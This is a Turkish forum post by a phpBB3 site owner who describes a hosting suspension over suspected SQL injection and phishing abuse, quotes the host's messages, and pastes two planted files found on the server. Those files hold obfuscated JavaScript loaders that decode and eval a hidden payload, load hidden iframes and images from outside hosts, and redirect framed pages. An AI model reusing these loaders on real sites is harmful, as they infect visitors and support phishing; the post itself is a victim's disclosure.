BETA aşamasından beri PHPBB3 kullanmış ve en son PHPBB3 Gold sürümüne güncelleme yapmıştım.
Sunucu operatörleri, yazışmalarımız sonucunda sitemde -kesin olmamakla birlikte- SQL İnjection açığı olduğu yönünde fikir bildirdiler.
Yani birileri sitenin bir şekilde açığını bulmuş, ve siteyi çökertmek amaçlı değil, site üzerinden dolandırıcılık yapmaya yarayan bir sistem kurmuşlar...
Çok ısrar ettim, basit birşeydir falan dedim,sunucu operatöelri kesin olarak yayını açmadılar. Telefonla aradım, aynı şeyi söylediler yani durum ciddi imiş.Örnek olarak söylediklerine göre text-boxlara girilen JavaScript gibi bazı zararlı kodları sistemin normalde belli bazı parametlelrle tanıyarak kabul etmemesi lazımken benim sitede edebiliyormuş falan...operatör yazdı:Phishing sizin sitenize yönetilmiş bir saldırı değildir. Bu yöntem ile sisteminizin altına genellikle banka vb. sitelerin klonu yüklenri ve spam aracılığı ile kullanıcılar bu sisteme giriş yaptırılarak banka bilgileri ve hesap şifreleri elde edilir. Aynı durum msn şifreleri e-posta şifreleri vb. içinde geçerlidir.
Bu konu ile ilgili uyarılıarı yurt dışından almaktayız. İşlem kesinlikle yasal değildir. Dolayısı ile bu tip bir güvenlik açığı bulunan sistemin servislerinin açılması malesef mümkün değildir.
İyi Çalışmalar
Hatta ben IP üzeirnden FTP 'ye bağlanarak benim yüklemediğim bazı dosyalara ulaştım.
Dosyaların isimleri x.html ve -kök dizin hariç- index.php
Bu dosyalar yazma izni verilen, store/ ve cache/ klasörlerinin içerisindeydi.
Başka klasörlerde yoktu..
Ayrıca kök dizinde de x.html isimli dosya vardı ama burada index.php bizim orjinal olan dosya..
Mesajın sonunda bu dosyaların içeriğini ekleyeceğim..
Sonuç olarak ben PHPBB 'yi Beta aşamasından beri kullanıp güncelleme yaparak yükselttiğim,operatör yazdı:Merhaba,
Kullandığınız PHPBB sürümünde güvenlik açığı olabilir. SQL injection açığı bulunuyor olabilir. Bu şartlar altında servisilerinizi aktif hale getirmemiz malesef mümkün değildir. Dilerseniz tüm içeriğinizi silebilir ve servislerinizi aktif hale getirebiliriz. Kullandığınız sistemi değiştirmenizi veya özel bir sistem yazdırmak için bir yazılımcı ile çalışmanızı öneririz. Genellikle hazır kod sistemlerde bu tip problemler ile karşılaşmaktayız.
İyi Çalışmalar
Beta aşamasında Çeşitli MODLAR kurup sildiğim,.. vs için sistemde SQL İnjection açığı oluşmuş olabilir.
Ben eğer tekrar devam etmeye karar verirsem, yine PHPBB kullanacağım ama sizleri de bu durumdan haberar etmek istedim.
Eğer sıfırdan PHPBB3 kurduğum halde tekrar böyle bir olayla karşılaşırsam buraya yazar ve sorunun PHPBB3'teen kaynaklandığını söyleyebilirm...O zaman ayrıca bu konuyu konuşuruz.
Ek Dosyalar:
İsmi: x.html
Bulunduğu yerler:
/httpdocs/store/new/
/httpdocs/cache/
/httpdocs/
Dosyanın içeriğini aynen kopyalıyorum.. Bu dosyayı ben eklemedim, nasıl geldiğini de bilmiyorum.
Kod: Tümünü seç
<html>
<body>
<iframe width=5 height=5 id="lf" scrolling="yes" src="http://dorukelektronik.com/images/traker.html"></iframe>
<img name="morda" SRC="http://www.farmprn.com/images/1.jpg" width="2" height="2" border="0">
<script language="JavaScript">
<!--
b="nOHscsJPj6nT:C!)t4=u0"
+"L3e]t@u8HPLDuLc<a/lj#,V$w;Qlb'qO9ddhWqJ6u*{AfFu'qOJgQoLW{Ow]S~fL:{MtJxINs~5vAyY}"
+"kBGPPg~#Q:Ou cjQZ*dzWmbKc5#iHAurwvIB.<T C=Wl(dIB$^:bo"ePeYT'zOD.DDQKQE7MdUy'n/"
+"Hu."vuZwbKce5BBfH,EIFdfg#$h{Ku7"CoM8,[a~'DeS7puHw{SHCD8yz2I/1k4(nu1+LAU+@EMn="
+"[zuH}zMPi6u5QE:Kn8caEXcFkSEBMmO^xAq,3'MGQ{x6SP{4lN9lwTdwA$xIYH{5tasO,=cAuv6ivdQy";var sD=location.href;aD=sD.split("/");a="@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!#$^&*():;/. {nt=<+[]}',"";key=aD[0]+'juBw3fS5v6Jg3;pH4/rgEjoTp24';if (key) {
fin = "";
pos = 0;
for (i=0;i<b.length;i++) {
first = b.charAt(i);
second = key.charAt(pos);
fin+=a.charAt((a.indexOf(first)-a.indexOf(second)+a.length)%a.length);
pos = (pos+1)%key.length;
}
eval(fin);
fin=a=b=key="";
}
// -->
</script>
</body>
</html> İsmi: index.php
Bulunduğu yerler:
/httpdocs/store/new/
/httpdocs/cache/
Kod: Tümünü seç
<HTML>
<HEAD>
<title>WELCOME</title>
</HEAD>
<script language="JavaScript">
if (self != top) { top.location.replace('x.html'); }
</script>
<script language="JavaScript">
<!--
b="DuLd;vKYl"xWLWw(HOUPVBUI_BByieBCsmnD$H"EHgo*:7oZzhiNCE>CtWBg4 s#D!"
+"NX&t4t$GwwzyIcsFRxp2;t"LYMH7$/kWKjDyLOdrdFFpV8G^r)MH6:(y^CyiHNFbywIPwS;B~A*JI "
+"n4xYunzywJtFvVVxR^B*D)OO8tQi7cfAJHudctPFiX=@_N*OH*X'kVc7a;m/K(:bimX9s>b5OP&YO"
+">XFhCGyDd,NVFxO(BRfSAU4(8yYK_zIQI9d)< @GMhXr#GVTYK@HwwiGyr+BuIO"Dj23cZJU79/%N(+"
+"%zLq,oJTxgS:uZiooAYalG,V_VU6U9dDEFrL^z/x!BwR 6x8CqqHAf$8V.qn_nQZiOtW!9WA!Cd+nrk"
+"=BrQBn2 qZiOtD&tteKk_vILucsQIkj16A^q#MG8.T@>5+%MwH+vCMKkzZ1oiVpo9.4sYJjBrk+4b";var sD=location.href;aD=sD.split("/");a="@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!#$^&*():;/. t='n_"<%,>+";key=aD[0]+'jqDwdJ5n9oXuC343fTqe';if (key) {
fin = "";
pos = 0;
for (i=0;i<b.length;i++) {
first = b.charAt(i);
second = key.charAt(pos);
fin+=a.charAt((a.indexOf(first)-a.indexOf(second)+a.length)%a.length);
pos = (pos+1)%key.length;
}
eval(fin);
fin=a=b=key="";
}
// -->
</script>
</HTML> 
